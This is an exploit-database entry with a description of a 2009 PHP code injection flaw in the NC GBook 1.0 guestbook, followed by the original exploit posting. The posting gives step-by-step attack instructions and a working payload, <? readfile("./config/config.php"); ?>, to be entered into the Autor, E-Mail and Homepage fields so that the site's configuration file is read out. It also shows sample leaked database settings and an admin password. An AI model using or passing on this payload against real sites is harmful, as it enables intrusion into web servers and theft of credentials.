NC GBook 1.0 Remote Command injection Exploit

vendor:

NC GBook

by:

ThE g0bL!N

9,3

CVSS

HIGH

Remote Command Injection

CWE

Product Name: NC GBook

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:php-gaestebuch:nc_gbook:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

NC GBook 1.0 Remote Command injection Exploit

An attacker can exploit a vulnerability in NC GBook 1.0 to inject arbitrary commands into the application. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'Autor', 'E-Mail' and 'Homepage' fields when adding a new entry. An attacker can exploit this vulnerability to inject arbitrary commands into the application, which will be executed with the privileges of the web server process. This can be exploited to gain access to the server, or to execute arbitrary PHP code.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

--------------------------------------------------------------
NC GBook 1.0 Remote Command injection Exploit
---------------------------------------------------------------
Founder :ThE g0bL!N
Vendor:http://www.php-gaestebuch.com
Thank You Very Much His0k4
Download:http://www.php-gaestebuch.com/downloads/1.0/
Note: You Can choose Any Function in Php :)
---------------------------------------------------------------
Exploit:
--------
    1) Go To Url:
    ---------
              http://wwww.victim.co.il/[path]/index.php?gbAction=add .
     
 2) Write In:
     --------
                Autor:  <? readfile("./config/config.php"); ?>.
                E-Mail:  <? readfile("./config/config.php"); ?>.
                Homepage:<? readfile("./config/config.php"); ?>.
     
  3) Post The Topic:
        --------------
 
  4) View Source:
     -----------
 
  5) Hack The site :)
     ---------------
Exapmle:
--------
$gbConfig['database']['system'] = "mysql";
$gbConfig['database']['server'] = "localhost";
$gbConfig['database']['user'] = "";
$gbConfig['database']['password'] = "";
$gbConfig['database']['name'] = "";
----------------------------------------
$gbConfig['admin_username'] = "ThE g0bL!N";
$gbConfig['admin_password'] = "sh5d81d6zs7yt4g41g";
$gbConfig['admin_email'] = "x0q@hotmail.fr";
--------------------------------------------------
Demo:
----
http://www.php-gaestebuch.com/demo/
----------------------------------------------------------------
Greetz : His0k4 Dos-Dz TeaM Snakes TeaM And All My Freinds (dz)
-----------------------------------------------------------------

# milw0rm.com [2009-05-20]